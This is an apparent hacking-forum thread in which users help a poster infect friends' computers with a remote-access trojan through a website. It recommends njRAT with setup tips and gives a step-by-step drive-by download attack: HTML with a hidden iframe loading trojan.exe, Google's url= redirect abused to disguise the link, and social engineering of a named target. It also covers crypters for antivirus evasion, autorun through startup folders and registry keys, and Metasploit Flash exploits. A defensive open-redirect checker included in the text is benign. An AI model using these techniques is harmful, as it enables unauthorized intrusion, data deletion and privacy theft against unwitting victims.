Trojan on Websites!!


1

Hey Guys ;D

So I was thinking about launching a Trojan to prank some friends (serious prank/real Trojan), but then I came up with this idea: what if I could send them a website URL that is infected with a Trojan (mine perhaps)? But here’s the problem, I have no idea how to upload/infect my website with a Trojan and I suppose that the Trojan should be written in a different language (I have no idea actually). :/
So I started this thread in case there is someone who knows or would like to investigate and kinda help me with doing that!! :D

Thanks a lot!!
-Pain-

52 replies · 10 voices · 505 views · 4 images
SFisher
9 years ago | edited 9 years ago

1

Normally, this kind of thing is done through JavaScript holes; if I remember well, Metasploit has some modules for malicious content in websites. Check it out.

If you don’t want to think too much, just look for kind-of-recent vulnerabilities in browsers (Mozilla), in Flash or something similar that is already loaded into Metasploit, then you can 1. include the malicious code in your website or 2. copy a website (I think the Social Engineer’s Toolkit does this) and include the malicious code on it (like phishing, but you’re probably not looking for credentials).

But of course if you want one that will never fail and never be outdated, this simple line of code is for you. Put it in the body of your page and you’ll have a trojan there forever.
<img src="http://3.bp.blogspot.com/_nYiKfX2DBu4/TE5a2JnGGvI/AAAAAAAAAQo/MyTQH5jiczE/s1600/trojanhorse.gif">


0

I want more like a Trojan that is like a RAT :/. Also I need some help with the coding.
My main idea is that people access the website and get infected by the RAT, which connects to a client so I can control them xD

SFisher
9 years ago

0

Eh… you can trick the user into downloading the RAT.
Or you can use RCE vulnerabilities in the webapps I mentioned.
:)
Let’s wait to see what others have to say.


0

Hmm..Sure :D


4

21CmOfPain I suggest you put the Trojans (or malicious cookies) on your own site, opened beforehand, to make it easier to control it.
About RATs I suggest Nj RAT ==) http://up.dev-point.com/downloadf-07168af203491-rar.html
Image


0

Just downloaded and set up Nj RAT, do you know where I can send it to test if it's working? ;D

?ouo? ?????? [rekcah.ronoh]
9 years ago | edited 9 years ago

3

@21CmOfPain ==) send it to a victim :D. Seriously, do you know how to make a trojan with that? You must either disable your firewall OR open port 1177 in it.
There is more than that (details)


0

rekcah.ronoh
Router's FW and Windows' are both down, the AV's firewall is up but I set an exception for that :D
But I couldn't wait to find a victim, because most of the time it won't work, so I ran it on my PC and nothing happened and nothing appeared in the connections on NjRAT's interface… :/
(No worries, I cleaned everything after a restart xD)

?ouo? ?????? [rekcah.ronoh]
9 years ago | edited 9 years ago

3

[quote=21CmOfPain][/quote] ;) You must clear your registry too. This is the most important thing. To clean it automatically with a simple click ==) download CCleaner and clear all the resources of your registry.

Of course nothing will happen, because I guess you left the HOST as 127.0.0.1. If you want something to happen, replace 127.0.0.1 with your IP or No-IP host.

?ouo? ?????? [rekcah.ronoh]
9 years ago | edited 9 years ago

3

yeah cooool this site will help you ;) , goodnight @21CmOfPain

**rekcah.ronoh Logged Out looooooooooool**

Magical Cat Does Hax [magicalcatwithhax]
9 years ago | edited 9 years ago

0

Haha Thanks :D rekcah.ronoh

I will close the thread in 4 hours in case someone wants to post something!!

SFisher
9 years ago

-1

Image


0

Sorry but, what is that supposed to mean? >.<

???Roun512 [roun512]
9 years ago

1

I read somewhere about JavaScript editing the registry settings on Windows OS that shuts down the computer ~> for example I put JavaScript code in my site and when he visits it the JS starts :p


0

Wow, that's a cool one :D I will search for it!!

Note: Dunno, I think I should give the thread a little more time to breathe before I kill it :)


4

[quote=21CmOfPain]Haha Thanks :D @rekcah.ronoh[/quote]
Anytime, you're welcome :D

[quote=roun512]I read somewhere about JavaScript editing the registry settings on Windows OS that shuts down the computer ~> for example I put JavaScript code in my site and when he visits it the JS starts :p[/quote]
Pretty goooooood idea, hehe, to crash computers :)

???Roun512 [roun512]
9 years ago

1

Note: Dunno, I think I should give the thread a little more time to breathe before I kill it

No need to kill it :).

Keep it open if you want :p


0

Also I searched about the shutdown script, but it seems to be PHP or something else. Cuz I read that JS doesn't have the privilege to shut down the PC, or I misread it… :/

Pete Maynard [Osaka]
9 years ago

0

With PHP you can run something like ‘exec(“sudo halt”)’ and if the webserver has the correct permissions it will shut down the machine. But that leads us into PHP shells, and not what you are looking for.

What you would want to do is look into Metasploit; something like this might be what you are looking for.

Max Lockhart [MaxLockhart]
9 years ago | edited 9 years ago

7

[It’s one of those posts again. Those who know who I am understand.]

God, it’s a fucking pain. I have no idea how one would go about doing that, but maybe I can help you some. I wanted to post this earlier, but I ran out of time to finish writing. Please scratch the idea of using a RAT. :( They’re very nice, very graphical, but you’re really just letting the software do the hacking and building the virus, as well as spending way too much time setting up everything. RATs are so skiddie-ish unless you create them yourself, I guess. Look for your own vulnerabilities and please program your own tools.

Anyways, time to get back on topic…

Okay, like @SFisher said earlier that you’ll need some JavaScript to help do this.

Things you’ll need:

  1. A server to host your trojan and some code! (NOT FILE HOSTING WEBSITE OR CLOUD SERVER SHIZ)
  2. An innocent site who has never done anything wrong in their life, to help host the attack!
  3. Desired user content to better lure and distract the victim!
  4. Basic Social (Network, if you may add) Engineering skills

Simple, if you don’t want to run the attack off of your own server simply use a proxy or vpn and sign up at http://www.000webhost.com/

Alright, let’s get cooking!

First, let’s look for some content to lure the victim, which goes hand in hand with finding the innocent site. If they like Pokemon, then we’re going to find something related to Pokemon; if they like anime, then there are plenty of anime websites out there vulnerable to this indirect attack, such as animefreak. But, for the sake of this tutorial, I have chosen to use Google.

Scenario Time!

So, check it out! My school mate John Smith likes memes. They crack him up! Every time I see him in computer class, he and his friends are laughing at all sorts of memes on Google Images. I don’t talk to him whatsoever and am almost apathetic toward him. There is one thing though… this girl I have fancied for the longest time and I have got together and are getting pretty tight. But John Doe so happens to be her ex, and he has nudes of her. I don’t like this idea, so I have built a Trojan to access his computer and delete everything. He’s a pretty clever guy in society but not too computer savvy. Perfect…

You see, that’s where these social engineering techniques come in handy, along with the desired content and innocent website. What we want from this website is the URL. Something that is trustworthy and non-threatening, as garbled-up text looks. So, I notice he’s on Google Images a lot and it’s a very trusted source. Everyone trusts and seems to love Google. Well, I want to tell him to check out some memes, right? He needs to laugh…

Google Search some memes.

Image

Boom, there you go! Freakin' gets me every time–
That’s nice and all, but what we want is this….

Image

Here you go:

**http://www.google.com/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&docid=109b66-mhqykrM&tbnid=BUJ_7Xz-cu91vM:&ved=0CAIQjBw&url=http%3A%2F%2F3.bp.blogspot.com%2F-d_kHaRLI0Io%2FUjIEBho-lPI%2FAAAAAAAASm0%2FcwBpYjd9HVI%2Fs1600%2Fgoats%2Bare%2Blike%2Bmushrooms.jpg&ei=1cVhU_DlMumwyQGZ8IEY&psig=AFQjCNFqFIFI0GW9p5Zrzyao7N5lFoiyaA&ust=1399002938488613**

Well, what’s the big deal? If he visits the URL it just takes us to the picture, no biggie! See, that’s where the site f’d up. Notice where it reads &url=http%3A%2F%2F3.bp.blogspot. etc.? That’s the actual location of the image. Well, we don’t want them to view the image… yet! ;) So we’re gonna cut all of that out, and our result is….

**http://www.google.com/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&docid=109b66-mhqykrM&tbnid=BUJ_7Xz-cu91vM:&ved=0CAIQjBw&url=**

After that, where the url area is, is where the link to our web server will be placed. Kind of see where this is going?
Go ahead and try http://www.google.com/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&docid=109b66-mhqykrM&tbnid=BUJ_7Xz-cu91vM:&ved=0CAIQjBw&url=http://www.youtube.com/ and see what happens.

Setting up the Server:

Whatever server we are going to host our malicious scripts and virus on will be set up.
If you sign up at 000webhost.com, create your domain name and junk, set up the FTP server information, then go to it by clicking the website domain name you just created, hit go, scroll down to file manager, log in with your FTP credentials, go to the “public_html” directory, delete the default file they have in there saying your site is ready, hit upload, and then upload your virus along with whatever dirty script you’ve got.

Triggering Download via Browser Hijacking

Unfortunately, I couldn’t seem to figure out a way to bypass the download prompt. I’ve tried using keycode events to help toggle the enter key after the user is prompted; that didn’t work, since it was loaded on the page and the external application couldn’t be affected by the page's script. I tried elevating permissions in order to change the browser's settings, some PHP, and I just can’t seem to get it. Sorry about that :/ .

Though, I do have this piece of code for you

<html>  
<head>  
<script type='text/javascript'>  
function hijack() {  
    // Out of order, sorry...  
}  

function redirect() {  
    var dst = 'http://3.bp.blogspot.com/-d_kHaRLI0Io/UjIEBho-lPI/AAAAAAAASm0/cwBpYjd9HVI/s1600/goats+are+like+mushrooms.jpg';  
    window.location.assign(dst);  
}  
</script>  
</head>  
<body>  
<iframe width='1' height='1' src='trojan.exe' onload='redirect()' />  
</body>  
</html>  

As you can see the iframe is set to the trojan you programmed. This is so the download is triggered as soon as the iframe loads. After that the page simply redirects to the actual meme you want your victim to see.

So, our little malicious document is complete! Well, except for it doesn’t bypass the prompt. If anyone has anything on that, that would be fantastic. Do share, I would love to hear! Okay, we have 21CmOfPain.freedomains.com set up and running for business.

Let’s apply that to our link.

**http://www.google.com/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&docid=109b66-mhqykrM&tbnid=BUJ_7Xz-cu91vM:&ved=0CAIQjBw&url=http://www,21CmOfPain.com/**

Tada! Wait a minute…. ewww, that looks gross. Yeah, it says google.com in the beginning of the link, but anyone with enough sense can notice where it says 21CmOfPain.com and automatically think bad business. That’s okay, we can fix this; a little bit of URL encoding might make it look better!

**http://www.google.com/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&docid=109b66-mhqykrM&tbnid=BUJ_7Xz-cu91vM:&ved=0CAIQjBw&url=http%3A%2F%2Fwww.21CmOfPain.com%2F**

It blends in a bit better now. Well, looks like the attack is ready to launch!

This is where the Social Engineering comes in:

I decided to add John Smith on Facebook and have a friendly little chat with him, and things went pretty well. I did the same the following day and got him softened up, and had some interesting conversations and shared some hilarious videos. Excellent, time to initiate the attack! We started into a conversation about memes and exchanged them back and forth. After a while, and getting him pretty careless about visiting my links, it was time to launch the missile. Upon submitting the link I started a listening connection on port 4567 and waited for the connection, assuming that yours is well written and executes on its own, that is.

  1. John Clicks the link
  2. Google Redirects him to our 21CmOfPain.com
  3. The Trojan is Downloaded
  4. John then gets redirected to a picture of a funny meme

All as if nothing had happened. The connection was established, I ran the Remote GUI to the RAT, then successfully located and deleted the photos.

Voilà! h4ck3d….

That’s how you could go about doing this. I hope this information was helpful and helps you on your way to your prank. It’s always fun to do little pranks on friends via hacking. Usually how I’ve spent most of my Winter and Summer breaks anyway. lol I again apologize that I couldn’t bypass the download prompt. It’s just that one little piece of security that would complete the whole circuit. I know it’s possible because I’ve been browser hijacked before and have had backdoors set up, along with bypassing privileges in order to run malware on my system. In fact, most of this is written from my experience with being hijacked and examining the process.

I would again love to see someone post something on bypassing the Save / Close prompt that would be awesome and very much complete the circuit. Hope I helped some….

Happy Hacking mate!


1

Also, @Osaka, PHP is server side, so wouldn’t that just shut down our web server, not the client's machine? Or could I perform commands on another’s machine with an HTTP CONNECT (TCP/IP) request? I do know that we could SSH into that box if we’re using PHP, but not sure about the other way.

@21CmOfPain
Another thing if you really want to get a bit deeper into the theory of hacking and information gathering, you could run the same process twice.

First send them to the link we designed, and instead of trying to directly download your trojan you could modify our previous script to collect information about the user's browser and store it on your server. You could then check to see if they’re using Internet Explorer. If so, IE supports Visual Basic and I believe batch scripting as well. So in VB you can bypass the download prompt with some work, or use batch commands to alter the browser's settings, and just send them another link which includes the second script to download your Trojan. I didn’t think about that earlier… I would still like to see if anyone had any ways or techniques using JavaScript and PHP.
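The `url=` parameter trick walked through above is what defenders call an open redirect: a trusted host's redirect endpoint forwards the browser wherever the parameter says, and percent-encoding only hides the destination from a glance. As an added example, not code from the thread or from Google, here is a Node.js link check that a redirect endpoint or a link-safety filter could apply: it decodes the parameter, resolves the target and reports whether the destination is allowlisted. The allowlist hosts are an assumption for the illustration; the sample links are the ones quoted in the post.

```javascript
// Added example, not code from the thread: a defender-side check for the
// open-redirect pattern discussed above, where a trusted site's redirect
// endpoint forwards the browser to whatever its `url` parameter names.
// The allowlist is assumed; the sample links are the ones quoted in the post.

// Hosts the (hypothetical) redirector is allowed to send a browser to.
const ALLOWED_TARGET_HOSTS = ['www.google.com', '3.bp.blogspot.com'];

// Exact host match or subdomain match ("img.example.com" is allowed by "example.com").
function hostAllowed(hostname, allowed = ALLOWED_TARGET_HOSTS) {
  const h = hostname.toLowerCase();
  return allowed.some((a) => h === a || h.endsWith('.' + a));
}

// Classify one link. Returns { redirector, target, verdict, reason } with verdict one of:
// 'invalid' (not a URL), 'no-redirect' (parameter absent), 'empty' (parameter blank),
// 'blocked' (target scheme is not http/https), 'external' (target host not allowlisted),
// 'allowed'.
function checkRedirectLink(href, { param = 'url', allowed = ALLOWED_TARGET_HOSTS } = {}) {
  let link;
  try {
    link = new URL(href);
  } catch (e) {
    return { redirector: null, target: null, verdict: 'invalid', reason: 'not an absolute URL' };
  }
  const redirector = link.hostname;
  if (!link.searchParams.has(param)) {
    return { redirector, target: null, verdict: 'no-redirect', reason: `no ${param}= parameter` };
  }
  // searchParams.get() percent-decodes, so "url=http%3A%2F%2Fx" and "url=http://x"
  // yield the same target: the encoded form hides the host from a glance, not from code.
  const raw = link.searchParams.get(param);
  if (raw.trim() === '') {
    return { redirector, target: null, verdict: 'empty', reason: `${param}= is blank` };
  }
  let target;
  try {
    target = new URL(raw, link); // a relative value resolves against the redirector itself
  } catch (e) {
    return { redirector, target: raw, verdict: 'invalid', reason: 'target is not a URL' };
  }
  if (target.protocol !== 'http:' && target.protocol !== 'https:') {
    return { redirector, target: target.href, verdict: 'blocked', reason: `scheme ${target.protocol} not allowed` };
  }
  if (!hostAllowed(target.hostname, allowed)) {
    return { redirector, target: target.href, verdict: 'external', reason: `${target.hostname} is not an allowed destination` };
  }
  return { redirector, target: target.href, verdict: 'allowed', reason: 'destination is allowlisted' };
}

// The four forms of the link quoted in the post above (constructed sample input).
const GOOGLE_PREFIX = 'http://www.google.com/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&docid=109b66-mhqykrM&tbnid=BUJ_7Xz-cu91vM:&ved=0CAIQjBw&url=';
const SAMPLE_LINKS = {
  original: GOOGLE_PREFIX + 'http%3A%2F%2F3.bp.blogspot.com%2F-d_kHaRLI0Io%2FUjIEBho-lPI%2FAAAAAAAASm0%2FcwBpYjd9HVI%2Fs1600%2Fgoats%2Bare%2Blike%2Bmushrooms.jpg&ei=1cVhU_DlMumwyQGZ8IEY&psig=AFQjCNFqFIFI0GW9p5Zrzyao7N5lFoiyaA&ust=1399002938488613',
  blank: GOOGLE_PREFIX,
  youtube: GOOGLE_PREFIX + 'http://www.youtube.com/',
  encoded: GOOGLE_PREFIX + 'http%3A%2F%2Fwww.21CmOfPain.com%2F',
};

// Verdict per sample: { original: 'allowed', blank: 'empty', youtube: 'external', encoded: 'external' }.
function classifyAll(links = SAMPLE_LINKS) {
  const out = {};
  for (const [name, href] of Object.entries(links)) out[name] = checkRedirectLink(href).verdict;
  return out;
}

for (const [name, href] of Object.entries(SAMPLE_LINKS)) {
  const r = checkRedirectLink(href);
  console.log(`${name.padEnd(8)} ${r.verdict.padEnd(11)} ${r.target || '-'}  (${r.reason})`);
}
```

The encoded and plain forms of the 21CmOfPain link produce the same `target`, which is the point: a redirector that checks the decoded destination against an allowlist (or refuses off-site targets outright) closes this hole regardless of how the parameter is dressed up.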

SFisher
9 years ago

0

Max, I knew the post was yours before reaching your name. ;)
Thank you very much, as usual, for the great great info.


0

Lol, No Problem @SFisher

?ouo? ?????? [rekcah.ronoh]
9 years ago | edited 9 years ago

1

**Shutdown PC** @21CmOfPain after some months, I wrote some code in Notepad, then I saved it in .bat format, then I converted it to .exe format ==> I sent it to a victim via Facebook chat. I gave the file the name of this victim until he fell ill with curiosity and opened the file ==> he fell into the trap & his machine was shut down. Sooo, I want to say that **==) turning off someone's PC is probably more wicked than funny (==**

If you got to the end of professionalism in the use of any RAT (encryption, merging, mining it, automatic downloading), you can hack all of his PC (his privacy: emails, files, & maybe you even benefit financially: PayPal cards or Visa cards….)


0

MaxLockhart, thanks for sharing this amazing info. Now I have to learn/study how to make a trojan…
(sadly I'm using my phone to browse so I can't give positive karma right now)

SFisher
9 years ago

1

@MaxLockhart , how about a flash file (a browser game, whatever) instead of a picture, and prompting the exe as an update for Flash?

[deleted user]
9 years ago | edited 9 years ago

0

Hmm, in order to hack/access the victim's machine, isn't he supposed to run the trojan instead of just downloading it?
Is there a way of auto running the trojan? :D

SFisher
9 years ago

2

No, you can’t “run something on someone’s computer from a webpage”.
Unless there’s a remote command execution vulnerability (RCE) in the application in place (Flash has many of them; some solved, some being sold/discovered in the wild), I remember writing this at some moment earlier. xD
That means, for example, for Flash: let’s say the client is running Adobe Flash (not the new and wonderful HTML5 implementation); when they run it, it loads into memory; if there’s an RCE you can tell the SWF application to put in their memory certain “orders”, to execute actions.
This usually means you have full control over the device.

To do something like this you could find one of these yourself, or buy one (not good, they don’t really last that much) (I mean the cheap ones, and I guess you wouldn’t want to spend something over a thousand on this) (that would still be cheap though), or you could use one of the documented ones, if the client has an outdated version of the application. Remember people sometimes take weeks or months until they patch their software (some don’t do it for years).

That would be (I think) the only way to auto run the trojan.
However social engineering is in my opinion the way to go. Remember that people can patch software, update everything, etc… but you can’t patch people’s perceptions (only if they’re well trained, and sometimes high level access executives make really big mistakes so I wouldn’t count on that unfortunately). So in my opinion, the option that will always work is prompting a download that the user wants to download, with a file that the user wants to execute. It is your job to get to know the client well enough to choose which options are the best, of course (that’s the recon).


0

I see, thanks :D
Ow btw could you please recommend some websites on how to create my own trojan and its requirements?

SFisher
9 years ago

2

Could you be a little more specific?
For example what do you want it to do, how (what will be ‘the catch’, also by what means, etc), for what platform(s)…
Maybe you want to learn Assembly (you will need it). Creating it from scratch is a little tedious; I would recommend taking one that is made and experimenting with it, changing bits of code to learn what each line does. Then you can put it in a trusted program or build your own, it’s a nice way to start. Check SecurityTube for Assembly videos.

Maybe you can have a look at the “Social Engineer Toolkit” (and the blog), and on a more general topic, this blog.


0

SFisher, great links, I will read them all and search more in depth. Also I don't know any programming language, so.. yea, could you please mention what I should learn in order to follow the basics (even though I think I can find these on my own >.<)
Currently I have no idea about what the trojan would be able to do!

Thanks again :D

SFisher
9 years ago

1

As I said it’s better to work with something that is already made first, see what it does, then investigate and change the code (after learning a language).
Good languages to learn for exploit development are C++/C, and Assembly. If you want to trigger the download via a website, then of course Javascript.
I believe you can find multi-chapter video tutorials for these in SecurityTube.
Try to stay away from official programming language documentation because it can be very confusing at first. Go to StackOverflow, etc., and learn the things in simple terms. Investigate with those languages writing simple things. Then plunge into the code of known exploits (export them in raw from Metasploit, then read and change the source).
It will probably be a long journey. Think of it like learning a new language from scratch, it’s something that takes time to master.
You can always use automated tools for it (using plain metasploit or using one of those ‘RATs’ that you mention, something that I do NOT recommend especially if the RATs are for and from Windows; they usually come with ‘gifts’ inside, and by gifts I mean malicious extra code -> the attacker becomes the victim of someone else and doesn’t even realise). But automated tools are like online translators: crap. You don’t learn anything, you make horrible mistakes and it just doesn’t work.
Speaking well takes its time.

Good luck! :)

Cyan Wind [freewind1012]
9 years ago | edited 9 years ago

1

[quote=SFisher]they usually come with ‘gifts’ inside, and by gifts I mean malicious extra code -> the attacker becomes the victim of someone else and doesn’t even realise[/quote]
That’s a foreseen consequence for anyone who doesn’t know what he/she’s doing.

SFisher
9 years ago

1

Of course.
Not long ago I was involved in a project for including some… hmm you could call them ‘tracking tags’ in crypters for Windows.
Real (licensed) pentesters don’t (use Windows) use crypters, but develop their own. Or (maybe if in a rush) Metasploit comes with some pretty decent ones (especially the latest version).


1

Catch up time,

@SFisher Some malicious Flash content would work, I’m thinking. Flash is really flexible and is supposed to have some pretty good network utilities, I was told. I don’t know much about Flash, so if anyone has anything on that, do post! I went the JavaScript way instead of working with Flash, but with Flash you can mess with people's webcams and all kinds of privileged tools. What if maybe you could write a so-so in-browser Trojan with some JavaScript integrated with PHP? Tinker around with different connections by a script running on the client side? Do you think that would ever be possible? I think Flash would be the best way to go. Now I think about it, I remember reading an article a while ago on here about in-browser built viruses where that government was using a lot of malicious Flash script and then using JavaScript to change the prompts that were displayed in order to toggle people's webcams and microphones. Shit, I’ll see if I can dig it up. lol

@tlotr no problem, I had nothing else to do and thought, “I can totally do this, why not help?”

@21CmOfPain Yes, you are correct. But there are plenty of methods of executing a file without the user's consent. One method of executing a file without user permission could be: while in your browser hijack session, set the download directory to the startup folder or edit some registry keys. Also, like @SFisher said, go check out some Assembly languages. The lower you are to the system the better. I really don’t understand the purpose of high-level programming. It’s easier and very dependent on pre-built functions and libraries. I’d rather program everything from scratch. That's where originality and the programs become an art.

Fun Fact: 6502 Assembly was used in the creation of the Nintendo Entertainment System, which was built on the MOS Technology 6502 core processor. If you have played Super Mario Bros. 3 you can see how this is an art. A lot more intimate with your machine, man… lol the way to go.

Anywho, back on topic… yes, do try to keep away from others' automatic hacking programs, I guess you could call it? I’m referring to RATs and such. Metasploit is a pretty good tool, but its main purpose serves to help discover mainstream exploits. So the only good it serves is on non-patched systems or those retards who avoid updates. Which I currently am doing since I have a deep system problem and am about to scrap Ubuntu itself. It’s pretty much spyware in itself, which I started a couple threads on.

Using RATs and skiddie tools won’t teach you anything. Get used to learning some things and always keep updated with the latest Metasploit framework, but if you don’t quite understand the advanced hacking stuff, what you’re supposed to do, or how any of it works step by step, I would recommend taking a look at Armitage. It’s kind of like a beginner GUI version of Metasploit and emulates the CLI in real time to show you what’s going on. All of the stuff is loaded onto Kali Linux / Backtrack. Metasploit and Armitage cost money, but I think that Offensive Security has a contract with them, so that’s why I say use Kali or BT. All updates and everything are free. Pretty cool stuff.

Other than that…. All of the promising “Hack a PC in a Click!” tools out there will easily fuck you and your system in the ass. I mean, let’s take that into perspective. You’re sitting in a thread right now, talking about building a Trojan to send online and execute on your target's machine. Okay, let’s think how many forums in existence there are specifically about hacking and how many threads probably exist about this same topic and made their way into ‘promising programs’. lol

Now if you wanted to create your own Remote Control GUI like a RAT to better handle a large attack with multiple machines, that is a different story. You know what’s going into your code, what you’re programming it to do, etc. I mean, you could put some nasty code in to steal your own credit card info and steal from yourself, but that makes no sense. lol The point is to program all of your own tools, like @SFisher and @freewind1012 said about “crypters”. I think they are referring to encrypted chats? Correct me if I’m wrong, but, if you sit down and do your research and get really good at encryption then start creating your own encrypted p2p chats and stuff.

SFisher
9 years ago | edited 9 years ago

1

Great post again Max. A crypter is an encryption program that modifies/randomizes the source of another program and includes unrandomized code in the beginning so that the program auto-decrypts itself when executed. Its main purpose is to hide malicious code from antiviruses, so that when you analyse a file it appears to be good. However, heuristic analysis exists (if you want a nice antivirus, try attaching a file in Hotmail; they usually detect this “beginning decrypting code” and show the file as a virus - even if the encrypted code is actually a hello world). Also memory/flash analysis exists. So a crypter generally is an exe in which you specify a pre-existing exe, and click something like “encrypt, evil genius!” and the output is a self-decrypting file that is also your original file. You often see them qualified as “FUD”, fully undetectable. Now think. If an evil genius had invented software that can make a virus invisible… wouldn’t that person also want to spread their own viruses? Yes, right? Then why not put one of those in his crypter.
EDIT: Some people also call them encoders. I believe there are tutorials online to make your own crypter. It’s as simple as thinking of some way to shuffle a string of n elements and then un-shuffle it.

I am aware of some cool things you can do in Flash. I mentioned it for the reasons you said, it is indeed a mine of gold.
The webcam issue was first reported and openly published in 2011. By 2013 you could still do it on fully patched versions. Flash is not secure. There are safer alternatives.

Maybe I’ll write an article about nice things to do in Flash, if you want. In a week or 2.

As you said Metasploit is cool, but nothing by itself. It can be used for very obvious things but that’s it. And anyone that tested the Android reverse TCP apk knows this: in the target it first asks for ALL the permissions, then it shows as a program with the name “REVERSE TCP”. XD Metasploit is… well, a framework. You need to work with it and to feed it cool things if you want to have results. That often implies writing your own little exploits, then feeding them in a known attack vector. Metasploit’s exploits are really obvious and brutal, it’s like entering a building shooting with shotguns. Very loud and you set off a lot of alarms. It’s much better to find your subtle infil (like making the entry exploit be just a little downloader, then download tiny bits of code each time and then put it together and execute it, and make that be the main exploit - with written actions on it!! Not sending commands over the Internet) and then your subtle exfil (again making it as low profile and minimal as possible). Cobalt Strike and Armitage are good things to have a look at, like Max said.


1

Metasploit’s exploits are really obvious and brutal, it’s like entering a building shooting with shotguns.

Made me laugh my ass off, so true though. I would very much love to see an article on Flash exploits. I took VB last semester for the fact that I and friends of mine already knew how to program, far beyond any information you’d learn in school; it’d be such an easy A, to be together and hang out (since we did the same thing with the HTML 4.01 class the school offers), and a safe haven to host malicious havoc. Well, another guy in the class we all befriended knew C++, and together we started putting together a framework similar to Metasploit called Pillage and Plunder for script kiddies to use. We never finished it due to personal issues that happened at home, but I just recently hit him up and this summer we are going to build and release. So maybe we could add some Flash exploits in there. It’s completely (Cyber) Pirate themed.

That crypter stuff you talked about just blew my mind though. I think I may just need to implement that as well.

Off-topic question: there is a section of code included in a crypter that decrypts the rest of it. Could I or should I do that with encrypted communications? For example, an encrypted chat that generates a random encryption key, encrypts the chat, and sends the message on its way. Should I include the encryption key inside of the message to be decrypted on the other end? Because I could see someone finding the encryption key in a man-in-the-middle attack and decrypting the text as well. Should I send it separately? It could still be intercepted, so I see that as crappy. Maybe the encryption key should be encrypted as well, include its own key that’s encrypted, and has a key, no? Or should the key never be sent at all? Then the DST wouldn’t be able to decrypt the message at all. Just something I was curious about and how that works….

Do you think you could find an exploit using Flash and automatically downloading a file? Maybe we could co-write an article including what I wrote before and some Flash workaround. It’d be a fully custom exploit; something new that nobody has read yet.

SFisher
9 years ago | edited 9 years ago

1

That sounds like an interesting story and project.
I’m pretty sure Metasploit has a decent list of exploits for Flash vulns, just let me check later today.
When I said Flash is a mine of gold I meant people make money from it (from the vulns), it’s one of the most widespread markets.
With that in mind, I think the best would not be to try to find a new hole (which by the way requires a lot of knowledge that I do not have :)) but to wait for new exploits to be published; they’re found quite often so Adobe doesn’t launch a patch for each of them: they wait for a while until they have a bunch (say 30, 50, 70) and then throw the patch. That gives attackers extra time (plus the time people take until they find out there has been an update and actually update).

Also if we’re going to write an article I think it would be responsible to either not go into too much detail or just explain one of the common, semi-outdated existing exploits. Remember that publishing powerful tools ‘easy and open’ can be counterproductive sometimes: I’m sure you heard about the kid that was arrested last month for using something like ssltest.py to get 900 SIN. Some people don’t want to learn but to do bad things for the sake of evil. I do not support that.
But it would be nice to do it explaining what one of the existing ones does along with the implementation, yes. Good idea.

I’m sorry for the multispam but again for how to include the decrypting section you can find Assembly tutorials for free in SecurityTube and full courses on encoders for 64bit and 32bit.
Some more video tutorials.
Also remember that the crypter is an external program used for adding decrypting code (and encrypting the rest of the original code) to a file, always using the same method. This is not what you want; it’s better to come up with a simple altering pattern and then do little modifications of this algorithm for (mostly) every file whose code you want to obfuscate.

Metasploit comes with some nice encoders/shufflers, for 64bit and 32bit and using different methods. Some set off a lot of alarms, some others are less obvious and more stealthy. But it’s better to at least modify the output code after you generate it because AVs tend to look for the “decrypting” code in the beginning.
If you use Metasploit Pro, they came up with very innovative and effective techniques for AV evasion in the last version. With these you don’t even have to modify; many AVs don’t even know how to find it yet. I believe they published some articles in the blog regarding this…

For the chat thing… speaking from ignorance I think it’s better to do it locally… (like Alice makes/has a public key that is associated to her username or that the sender (Bob) knows, Bob encrypts a message in his computer with Alice’s key, sends it via chat and Alice decrypts it locally with her private key) Maybe you could do this over a server, like Alice is prompted a “choose a password” box upon login, and that password is used to generate a public key that is then associated to her username. When someone sends her a chat message, it is encrypted and then (maybe in her machine? Doesn’t make much sense) decrypted with her private key. :/ Doesn’t sound good to me. Too much trust in the server and too much trust in the confidentiality of communications between server and client. I think it would be better to use software for it, something like implementing GPG with a chat software so that the users don’t have to manually encrypt/decrypt every single message. I believe these things exist already. But again I’m no expert.

As I said I’ll check MS for known cool Flash exploits later, to see what can be done.


0

Wow guys THANKS a lot for all of your posts.
I will update you about my progress soon.
:D

SFisher
9 years ago

0

So maybe this is something worth having a look at, huh? :)
:D


0

WOW!! A vulnerability exploit of Adobe Flash Player
before the 12.0.0.43 update, right?
Nice, SFisher… But uhmm, how do you use it? >.<

Max Lockhart [MaxLockhart]
9 years ago | edited 9 years ago

0

  # Versions targeted in the wild:
  # [*] Windows 8:
  #   11,3,372,94, 11,3,375,10, 11,3,376,12, 11,3,377,15, 11,3,378,5, 11,3,379,14
  #   11,6,602,167, 11,6,602,171, 11,6,602,180
  #   11,7,700,169, 11,7,700,202, 11,7,700,224
  # [*] Before windows 8:
  #   11,0,1,152,
  #   11,1,102,55, 11,1,102,62, 11,1,102,63
  #   11,2,202,228, 11,2,202,233, 11,2,202,235
  #   11,3,300,257, 11,3,300,273
  #   11,4,402,278
  #   11,5,502,110, 11,5,502,135, 11,5,502,146, 11,5,502,149
  #   11,6,602,168, 11,6,602,171, 11,6,602,180
  #   11,7,700,169, 11,7,700,202
  #   11,8,800,97, 11,8,800,50

That’s awesome btw, thanks @SFisher

SFisher
9 years ago

0

My pleasure.

Max Lockhart [MaxLockhart]
9 years ago | edited 9 years ago

0

Ummm, don’t know Flash but, I read through it really quick and from JavaScript experience and some keywords you’re basically sending a Trojan to the user instead of the .swf content huh? That’s at least what I got from reading it.

SFisher
9 years ago | edited 9 years ago

0

Mmmmno. Well, more or less. What you’re doing is (through Flash) embedding an encrypted executable in the Flash file, some shellcode and of course the code that triggers the vulnerability (this is the one that the Metasploit module you saw adds), so that when the swf loads the executable appears in the memory of the target. How? Because there’s an RCE: Flash fails to validate the memory range, so you can execute code in an arbitrary location. You make the location executable, and pass the shellcode, which is intended to plant the executable (decrypted by Flash).
So you could make a swf that does this along with other ‘normal things’ and no alarms would be set, if the exe doesn’t trigger them, of course. I mean if there’s an active scanner and the virus is in their database, it will be caught. If no active AV is in place (only manual scanning), no alarms even if it’s in their database. And if there’s an active, updated antivirus and you’ve taken a little time to take care of the AV signatures and remove certain words from the code, then it will go under the radar.
Which is why I recommend alternatives to Flash (especially, open source alternatives: Shumway is a case).

You can read a reverse-engineered analysis of the exploit (what it does, and “how” without going into too much detail) here.

735Tesla
9 years ago

0

